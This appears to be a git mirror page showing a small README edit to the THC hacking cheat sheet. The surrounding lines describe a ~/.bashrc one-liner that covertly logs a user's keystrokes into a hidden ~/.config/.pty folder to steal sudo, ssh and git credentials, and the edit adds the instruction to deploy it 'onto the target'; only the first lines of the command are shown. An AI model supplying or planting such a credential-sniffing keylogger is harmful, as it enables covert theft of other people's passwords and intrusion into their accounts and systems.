mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 12:48:36 +02:00
Update README.md
This commit is contained in:
@@ -1890,7 +1890,7 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt.enc >input.
|
||||
|
||||
A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user.
|
||||
|
||||
Cut & paste the following and follow the instructions:
|
||||
Deploy: Cut & paste the following onto the target and follow the instructions:
|
||||
```sh
|
||||
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
|
||||
&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
|
||||
|
||||
Reference in New Issue
Block a user